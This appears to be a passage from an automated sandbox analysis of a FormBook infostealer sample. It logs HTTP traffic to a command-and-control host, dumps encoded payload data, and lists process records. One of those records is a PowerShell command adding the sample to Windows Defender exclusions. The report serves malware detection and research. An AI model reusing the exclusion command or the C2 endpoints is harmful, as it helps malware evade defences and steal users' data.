                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 [TRUNCATED]
                                                                                Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ 1s#N"h&\r&d&g\@Ys9=K\_0yE[%>7f`Um*Vf\R.4<IoT<t+tlcKdR,b7FpyG4y$sirB(`(s!M*/'6% v,Jv1^BjLUFjmn1fvDfUseN#l1=qY,L}?\&L0/5YGnik[:^gKh7b}'i2<,,O]:h?Pl_KwCQDSZq`~?=\vzYsi4q!C&ob4Qm*N&V;;Y"?XM3:S&!nA(Xnq}<7mkn7G6w&#n^SIj[Ot5p,I&rg@w"Ll
                                                                                Dec 3, 2024 14:24:35.024626017 CET1236INData Raw: b5 f5 a4 f9 09 9c 64 c9 a9 fd 5a 6c 5a 63 0d b6 d0 92 d8 0e a0 09 e6 cd f5 5e 51 be d6 62 79 09 93 c9 44 ff 6c 7f 7d 68 6d 04 2e 56 02 9b 19 77 f2 63 76 88 8e 6a c4 82 25 0d 7f 59 e8 60 1a bf 14 d1 d5 20 c4 67 1c 0f 7e 29 62 f0 e2 5f 8a be e7 45
                                                                                Data Ascii: dZlZc^QbyDl}hm.Vwcvj%Y` g~)b_E`Uq0-Ikml<h_U [/xl`3:3_M2\JEF"4n@>&\Zb~5WDm>eI\Bx;TLY; T/pi,am
                                                                                Dec 3, 2024 14:24:35.024703026 CET1236INData Raw: 25 fe 0c 5b 40 f3 80 30 e5 2a a9 56 85 8c 20 6a ed b1 bb c6 0f 6a e2 56 ef d2 8e 6c de 72 8b 30 c7 56 5f 66 d4 ef 7e 7f fa 32 75 c5 9b b5 16 a1 12 4a af a4 1a c7 4a 5a 1a b3 8c 8b f9 6e cc ed 76 2f e2 d8 ee 86 66 d5 1e 57 31 81 fe 46 12 26 67 a1
                                                                                Data Ascii: %[@0*V jjVlr0V_f~2uJJZnv/fW1F&goyj+ TYzuIP0ML*\J5t$5d;'X,AKpc1lrny\(mGqwL7V`1,KJFXA#!,93EX=X
                                                                                Dec 3, 2024 14:24:35.024741888 CET1236INData Raw: 9f 98 69 b2 58 66 55 fb 18 67 d8 7a 19 e9 0f b1 b9 7b 9f f1 c8 a6 d5 6b 75 5c e6 c6 5c 08 3f 2c b4 06 69 df b9 7d 8c d7 12 95 62 fa a5 ae 81 c2 56 eb 05 1f a2 d2 5a 04 38 26 68 bf 97 df 13 a3 04 8f c8 67 61 18 8e 57 76 b9 c0 b0 53 a3 66 16 2e 0d
                                                                                Data Ascii: iXfUgz{ku\\?,i}bVZ8&hgaWvSf.4strM.gUA~9Y>,8e^4! Ih5{5{7]-lKFW"\JM#f+}\i}DTI1']XR5nCoMr/3Q X]M'4UtE
                                                                                Dec 3, 2024 14:24:35.024847031 CET1236INData Raw: e9 64 71 f6 e6 4d c4 4d 2e d8 dc 27 55 11 79 cb b3 5c 69 cb a4 1d e3 6d 80 56 00 ed 13 a9 6a ae 70 d3 29 8b d0 68 75 d7 29 f0 24 b5 3e e9 a1 57 77 6f aa 69 6a 2e 32 a6 13 2e 7d e2 11 af e3 5d 3e ba 5e 89 53 49 e3 13 ea 75 1e 63 04 2c bc 4b b4 2a
                                                                                Data Ascii: dqMM.'Uy\imVjp)hu)$>Wwoij.2.}]>^SIuc,K*dT*gQez\fz+J1Egwl\MNkvPVhEzO&v~<bWO&{0N,BX}Qg2td>~2s\Ln@h=!
                                                                                Dec 3, 2024 14:24:35.024912119 CET1236INData Raw: f9 5b c1 34 f8 a4 37 3e 96 35 a4 03 9f 0c bb 83 a3 49 03 3a f4 c9 a0 3b 7c 22 a9 ef 92 fa 47 93 fa ae 5d ff 89 76 bd 0b 7a 8d bc 2f ba d7 47 d3 ae 31 d1 27 d7 dd de c5 5e 5a a8 84 42 9d 03 c1 c2 3b 9f 7c e6 95 9f fa 9c 70 ce 70 2b a2 e0 26 a5 89
                                                                                Data Ascii: [47>5I:;|"G]vz/G1'^ZB;|pp+&fsLgAp\RnQS34/"vY7SQqP't*@i&jXv%ap'E*~Da0:~'"j#v 1lzvReKF=80cL;|tV3c1W~
                                                                                Dec 3, 2024 14:24:35.024925947 CET1236INData Raw: c4 ec 41 67 70 85 99 87 52 ae 30 65 d4 f1 2e 8e a4 f4 30 a5 57 73 9f b2 48 cd 28 95 cc 16 9a 09 9f 5c e4 f7 e5 f7 1a bf 3a 09 58 d3 6b 93 e5 7f a7 ff 88 e3 b2 3a 02 c8 11 be 8f 35 e5 63 e4 d5 54 0f 0f 55 e3 af ce 37 9d eb 6a 0f 76 56 85 15 5c 42
                                                                                Data Ascii: AgpR0e.0WsH(\:Xk:5cTU7jvV\B[N+hnX?z:qGPPssV>Z)K0v.DDP@}&x^fydL'\BnBwosEnV!)6#iVeOUi-<efE|yE@$OY[$OCnI
                                                                                Dec 3, 2024 14:24:35.025064945 CET1236INData Raw: 6e 93 63 45 c4 15 89 79 52 73 07 59 00 d1 81 bb 84 09 01 7a 7e e0 96 67 2c 81 03 77 96 05 e2 d0 dd 94 47 b0 cd a6 b5 78 8e 0f 62 3c d3 98 65 5c cc eb 2a b6 ae 51 2a 15 cd 97 15 86 7f 04 9f 78 9d 2b 0d d9 f8 a1 93 32 83 6c 70 3d 55 8b 27 19 94 b9
                                                                                Data Ascii: ncEyRsYz~g,wGxb<e\*Q*x+2lp=U'-gILeMJ' RnD2#gh<g_57!:k_%KU@f29u{0~YORBOD+;9bS%-:{UqByUIbH.B_*i53DU1S
                                                                                Dec 3, 2024 14:24:35.025075912 CET1236INData Raw: 54 ba 2c f1 89 54 12 5e 07 dc 4f d5 14 74 4d 8b 42 46 a0 9d 0a 87 fb 18 60 3a 4c c9 7e e0 fd 7b c1 02 10 ed 47 17 35 99 5c e6 85 3d 29 73 49 b8 d2 d8 f0 8f 70 d0 11 ee 12 fd 90 31 21 5a b8 fd 67 72 2f 19 b5 16 81 d2 38 3f d5 2c e2 85 f1 3b 83 81
                                                                                Data Ascii: T,T^OtMBF`:L~{G5\=)sIp1!Zgr/8?,;!vm?XZ\7$U#;'[JR^i53[xKY juMiP,oz&i6{cEhoI,q\ T9W$>SF lyKej- TY'uTM
                                                                                Dec 3, 2024 14:24:35.025088072 CET1236INData Raw: 22 b7 67 8b e5 bd 69 f8 8b c6 1f 66 4a 47 b9 06 63 7e e9 72 44 d5 2c b4 7c ca ed bc e1 37 52 6b 73 ff 97 ee 2f dd 40 28 15 05 4c 30 19 42 c8 72 d3 41 9d f3 5f dc 30 5c 86 a2 88 00 8b 3f e0 37 e2 c6 fe d2 ad a8 d0 4c 45 85 80 7d 58 f7 1a c1 7d 27
                                                                                Data Ascii: "gifJGc~rD,|7Rks/@(L0BrA_0\?7LE}X}'~z]WupvDB!v:T";WQ+IlUW8y5+y7G-k3%"9cc`lX16jsMh^121
                                                                                Dec 3, 2024 14:24:35.145203114 CET1236INData Raw: dc 54 a4 4c 46 02 5c cd 7f ad ae ca 9a db 1b 33 4d c8 8c 47 36 9d 34 fa c3 06 49 c1 39 a2 3a df 67 42 e2 08 a9 b5 b9 df ed ce 66 b3 ce 6c d0 51 3a e9 f6 3d cf eb 62 61 83 4c 39 cc be 56 f7 93 86 47 3c d2 1f 12 57 56 09 c5 a3 08 b0 bd d5 05 34 48
                                                                                Data Ascii: TLF\3MG64I9:gBflQ:=baL9VG<WV4H\t,q5V4z=g';jv[JsWBpGF"&hoo9%uU[a,\FuEk!N2!|kUnH]UkYeTP~BY8gB%{{q.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.550026108.179.253.197801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:36.372147083 CET1841OUTPOST /qimy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bloodbalancecaps.shop
                                                                                Origin: http://www.bloodbalancecaps.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 6b 55 63 78 50 36 38 61 35 31 54 6e 4d 4e 6a 67 4b 79 67 31 4d 6f 4c 43 48 4e 38 57 4e 59 4c 4b 74 6a 42 2b 4d 57 63 6c 6f 6a 36 58 4e 6f 31 31 69 48 48 4b 4e 34 59 6c 6b 46 62 36 6b 53 44 69 79 64 63 42 62 50 4e 63 50 30 6b 61 47 43 30 72 79 52 6e 2b 70 4d 5a 50 6c 39 77 6e 65 36 67 48 59 4c 68 72 75 5a 31 4a 71 67 6c 77 57 66 61 58 74 33 41 6e 66 56 72 50 39 77 4a 48 54 36 4b 38 31 39 57 33 71 6f 52 37 53 54 57 6a 38 5a 74 34 76 44 41 31 4a 64 72 68 46 54 2b 4d 30 38 69 77 41 34 57 72 5a 4b 4e 42 46 77 6b 6e 77 6d 4b 74 39 52 67 71 41 2b 69 36 6c 56 62 67 76 79 45 59 74 59 37 45 6e 57 33 78 6e 64 52 59 53 69 39 6a 37 46 54 35 38 62 31 4c 56 78 70 54 43 6d 48 75 38 78 2b 6c 52 59 6f 2f 64 52 76 33 30 36 75 59 4d 36 5a 4c 74 69 34 57 52 51 77 74 51 34 4b 2f 57 6a 32 6a 59 4b 78 36 37 57 58 53 30 4a 2f 31 6d 48 5a 38 69 44 44 7a 64 6f 6d 57 50 72 59 45 49 76 44 4f 46 34 6a 6a 51 30 63 70 65 4a 4d 62 59 77 6d 49 2b 6f 34 4c 33 41 78 43 69 52 4f 34 4a 39 49 44 77 72 78 69 69 73 43 2b 65 72 42 [TRUNCATED]
                                                                                Data Ascii: fh=kUcxP68a51TnMNjgKyg1MoLCHN8WNYLKtjB+MWcloj6XNo11iHHKN4YlkFb6kSDiydcBbPNcP0kaGC0ryRn+pMZPl9wne6gHYLhruZ1JqglwWfaXt3AnfVrP9wJHT6K819W3qoR7STWj8Zt4vDA1JdrhFT+M08iwA4WrZKNBFwknwmKt9RgqA+i6lVbgvyEYtY7EnW3xndRYSi9j7FT58b1LVxpTCmHu8x+lRYo/dRv306uYM6ZLti4WRQwtQ4K/Wj2jYKx67WXS0J/1mHZ8iDDzdomWPrYEIvDOF4jjQ0cpeJMbYwmI+o4L3AxCiRO4J9IDwrxiisC+erB8EyP2mzPUeRCXuM/cjFFEQ1PnGGhKPfezGi4YZmrOwZnmrNbDwgQzYktRMf675Z3UD9fCZy7hGY/cAYp/ozYRE8tO3z+iwqPE3iPwiUXPDF1PSGj6iR6X7cGP+ZMA7opw9e6fnMfnOGP4AaffNJ54iSG2XeTaKL1TB4vZL3kdkn9VcDE9V4nbjXKZbQVEDPSWH+GhEpezhEnvM6oD+AVDWRN13jCw9S1081w19nQEud+OYBhP55qFCXPCFWmRo24Srqt6E+4b6bVkzokegKT5GpRsqYDdmdh94fyVcMiUkuffau/ZVbn4m/ybR3u/dELLL+pcROUV4VD6Q39DEp2qUGYqZISX1deLtHZVhDLrZl/aAnAjWdd+M22NNOsJyBh5jvut9nDJ0oCAVwCkaAV3Zc8rciGnHQ179vNGkE7DAYGuDCg9mKTVnoagKmrlpxL9R/L3t4byhqPFTsJv78mF6Jse0klTKoJYlH6z0qCEoWBzW6/D4CQJHICmFtpZZC9UgqNKVC39g8WQvwp5hcdP7oKZG+fUNg0SG+w6AqM4nKCT5kGtlPndEWS+Y0ZZiy8IcrjA+oeLOa3wS5MYiTPrPIXOhyj+Fom1+avBfxcd/nW5altSRpINd2Bz3DPeCKJcygbRTX/kToqB03tNwtFon3PO5No4/NjsI [TRUNCATED]
                                                                                Dec 3, 2024 14:24:37.768307924 CET1236INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:37 GMT
                                                                                Server: Apache
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                X-Endurance-Cache-Level: 2
                                                                                X-nginx-cache: WordPress
                                                                                Content-Length: 15183
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 [TRUNCATED]
                                                                                Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ 1s#N"h&\r&d&g\@Ys9=K\_0yE[%>7f`Um*Vf\R.4<IoT<t+tlcKdR,b7FpyG4y$sirB(`(s!M*/'6% v,Jv1^BjLUFjmn1fvDfUseN#l1=qY,L}?\&L0/5YGnik[:^gKh7b}'i2<,,O]:h?Pl_KwCQDSZq`~?=\vzYsi4q!C&ob4Qm*N&V;;Y"?XM3:S&!nA(Xnq}<7mkn7G6w&#n^SIj[Ot5p,I&rg@w"Ll
                                                                                Dec 3, 2024 14:24:37.768330097 CET1236INData Raw: b5 f5 a4 f9 09 9c 64 c9 a9 fd 5a 6c 5a 63 0d b6 d0 92 d8 0e a0 09 e6 cd f5 5e 51 be d6 62 79 09 93 c9 44 ff 6c 7f 7d 68 6d 04 2e 56 02 9b 19 77 f2 63 76 88 8e 6a c4 82 25 0d 7f 59 e8 60 1a bf 14 d1 d5 20 c4 67 1c 0f 7e 29 62 f0 e2 5f 8a be e7 45
                                                                                Data Ascii: dZlZc^QbyDl}hm.Vwcvj%Y` g~)b_E`Uq0-Ikml<h_U [/xl`3:3_M2\JEF"4n@>&\Zb~5WDm>eI\Bx;TLY; T/pi,am
                                                                                Dec 3, 2024 14:24:37.768345118 CET448INData Raw: 25 fe 0c 5b 40 f3 80 30 e5 2a a9 56 85 8c 20 6a ed b1 bb c6 0f 6a e2 56 ef d2 8e 6c de 72 8b 30 c7 56 5f 66 d4 ef 7e 7f fa 32 75 c5 9b b5 16 a1 12 4a af a4 1a c7 4a 5a 1a b3 8c 8b f9 6e cc ed 76 2f e2 d8 ee 86 66 d5 1e 57 31 81 fe 46 12 26 67 a1
                                                                                Data Ascii: %[@0*V jjVlr0V_f~2uJJZnv/fW1F&goyj+ TYzuIP0ML*\J5t$5d;'X,AKpc1lrny\(mGqwL7V`1,KJFXA#!,93EX=X
                                                                                Dec 3, 2024 14:24:37.768382072 CET1236INData Raw: 52 42 83 57 22 f4 08 e7 a5 84 86 af 44 e8 11 ce 4b 09 8d 5e 89 d0 23 9c 97 12 ba 78 25 42 8f 70 5e 46 68 a1 95 65 16 fc de 95 17 41 f2 70 76 f6 06 3f 1d 6e 68 99 4c 99 b1 a0 b9 b9 f3 03 88 95 06 b2 28 ef df 84 4a 5a 90 d6 27 e7 e7 e3 2a 32 e3 91
                                                                                Data Ascii: RBW"DK^#x%Bp^FheApv?nhL(JZ'*2M}4dXOPDBF>2tSk0`)PH3IXh$<9sy^s=\\Wop-FO]g bp\.7I]*rKiY0X|=.~J.e?v
                                                                                Dec 3, 2024 14:24:37.768399954 CET1236INData Raw: f7 f2 7b 62 94 e0 11 f9 ec 7a e8 fe 70 59 f7 6e 36 c7 6f b9 37 8c ac 24 f5 87 f9 fd ab 71 78 c2 4d be 54 12 d6 de 61 11 2f 9c 3f 56 44 3c f2 ef 41 c5 8f 55 58 98 85 2a ac db 51 c9 e8 f5 7a 3e 01 d4 5a 6c 89 4e ae 70 da fd cc 0e 13 3c 91 21 48 34
                                                                                Data Ascii: {bzpYn6o7$qxMTa/?VD<AUX*Qz>ZlNp<!H4>+ 1h3>:8btX(fk\MKx49pI*?1gEUh"'rwlH]"{5S@3\Ly"\yeNI*%b9UCk%xD>=
                                                                                Dec 3, 2024 14:24:37.768414021 CET1236INData Raw: 6f 7f c6 82 5e 14 c3 4e ab 94 7d 74 72 cc e4 4b fb c4 8c 85 ec aa fd 59 c4 22 0f c2 1d 6c 53 04 51 81 86 57 82 4f 5f 2c 53 cc 62 06 bd f6 67 17 97 ec e2 b2 b7 83 cf ac ca 78 88 32 01 cb 5e 0c 1f 45 97 d7 cc 6d 63 c8 46 d7 3b f0 d2 19 ca a4 2c 7a
                                                                                Data Ascii: o^N}trKY"lSQWO_,Sbgx2^EmcF;,z1@m0GreP0FKPI!0;VgGXO~*w.UT:c6otYNi,[2J-e'8?&WGb%ivVxd:"q45Z"&lK%S
                                                                                Dec 3, 2024 14:24:37.768429995 CET1236INData Raw: fa de 65 7b 78 81 ff 4f 35 9f 82 9e af 57 c1 e6 ae ed ca 0d dc a4 65 ec e8 12 fa 83 ab f6 f2 bb f1 c0 c5 35 0a 32 6c f7 ae 47 4f b5 0f 95 12 ae e7 8c e9 8c 9a 1c 42 ab 8b ec 68 c3 cb 21 f6 1a ba c5 6f 79 ae d7 ee f5 dd ea af 5b a4 bf ad 80 5b 0c
                                                                                Data Ascii: e{xO5We52lGOBh!oy[[J0\pXbs5Z}|(T:GR][4m-P:V?Gz)06VQ%}?QaNqW(ubBxWOB`Ur}_\1zOuC
                                                                                Dec 3, 2024 14:24:37.768634081 CET1236INData Raw: 55 b3 c7 0e db 66 bb a8 e7 fa 34 c6 86 f0 a2 8e ee 93 00 5f d6 76 5e ce f0 2c 44 f4 87 b1 9a 71 09 d1 a7 4e b7 0f f5 d2 21 f7 70 5e 6f d6 58 c0 7d 6b b1 bd ee 83 a9 89 e6 d1 5e ea de 1a 90 59 87 09 9e 48 01 b1 5d 60 84 21 2b 77 5e 71 e2 52 e0 08
                                                                                Data Ascii: Uf4_v^,DqN!p^oX}k^YH]`!+w^qRv%1\t\#72lc{CJV'Yer~]4u-Z67jK@\j!{:M}2eI,8\PHZ#8K\yT4';EM>qo{k3r
                                                                                Dec 3, 2024 14:24:37.768646002 CET1236INData Raw: 9f 8c 4c fb 35 d8 a1 92 56 33 63 3f 09 7d 05 72 0c ff d3 f8 6f 60 8e f5 18 bc 4e 8f 41 4d 0f 16 86 20 3f 4d a5 0a e2 30 f6 a7 29 b4 02 39 8c ff 69 ea ac 40 0e e3 0f 5f 03 7f 78 18 7f f4 1a f8 a3 1a fc 40 20 0c 0d 94 8e 40 af 80 b7 5e 8e 80 96 95
                                                                                Data Ascii: L5V3c?}ro`NAM ?M0)9i@_x@ @^u37)M4|,^^V L|)j^AE*V-f2y*HOwdY/rpGgV~v!iM0vOiQk0C%fuU|e|7
                                                                                Dec 3, 2024 14:24:37.768659115 CET1236INData Raw: e9 7a 7d 82 86 c6 6a b0 61 7a ba 80 83 bf cb 28 3d ef ef d3 b6 f7 6f 21 e1 f0 ef 33 4b ff ef d3 76 f0 89 12 3e 02 1c 2e 3e 14 c6 f2 78 5e 66 82 b4 be 9b 00 68 00 76 06 f0 2c b2 15 15 b3 8d 5e b1 9d 69 94 4a 2a f7 53 15 82 80 0c 5b 19 1a 87 ec 7a
                                                                                Data Ascii: z}jaz(=o!3Kv>.>x^fhv,^iJ*S[zt=`00"`p}A?KACmsJZt"8-9jflkpv5v.%<cI TxGq\0.(ss~{vMg}1Fu-Y`@iP'nU^~4g69>nRIj
                                                                                Dec 3, 2024 14:24:37.888576031 CET1236INData Raw: 23 d2 cc d8 3d 4d 81 27 a9 f5 49 cf eb 0f f3 fb d6 0a fa 38 d7 c1 f3 06 7f 2d b4 cd e4 a7 8e be 9c fd 24 05 2e 86 de c9 02 f4 5f 55 80 93 d1 3e 4d 80 9b ee c6 d9 95 c9 49 28 98 31 93 f3 59 4e 63 25 ad a1 42 85 4c 9c df 9e fd c1 bd d2 98 85 b0 58
                                                                                Data Ascii: #=M'I8-$._U>MI(1YNc%BLX2.9*2tx*q6c&c<6:-B(`BIUE>(E6Le^=cU.k%.w%;,7Biuf*-;y|_jCc:RO?w=t{p


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.550027108.179.253.197801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:39.042434931 CET533OUTGET /qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq+51atMbfrB/quJS6koXR/q8qHQdflns0zhBJovgpw==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.bloodbalancecaps.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:24:40.264003038 CET570INHTTP/1.1 301 Moved Permanently
                                                                                Date: Tue, 03 Dec 2024 13:24:40 GMT
                                                                                Server: nginx/1.23.4
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 0
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Location: http://bloodbalancecaps.shop/qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq+51atMbfrB/quJS6koXR/q8qHQdflns0zhBJovgpw==&jnGlY=dHeXwH1PkJZDr
                                                                                X-Endurance-Cache-Level: 2
                                                                                X-nginx-cache: WordPress
                                                                                X-Server-Cache: true
                                                                                X-Proxy-Cache: MISS


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:08:20:37
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\SW_5724.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\SW_5724.exe"
                                                                                Imagebase:0x550000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:CF8C34B20F0E8654371C004272B4DEF6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:08:20:38
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe"
                                                                                Imagebase:0xf30000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:08:20:38
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:08:20:38
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\SW_5724.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\SW_5724.exe"
                                                                                Imagebase:0x290000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:CF8C34B20F0E8654371C004272B4DEF6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:08:20:38
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\SW_5724.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\SW_5724.exe"
                                                                                Imagebase:0xf50000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:CF8C34B20F0E8654371C004272B4DEF6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:08:20:41
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff6ef0c0000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:9
                                                                                Start time:08:20:58
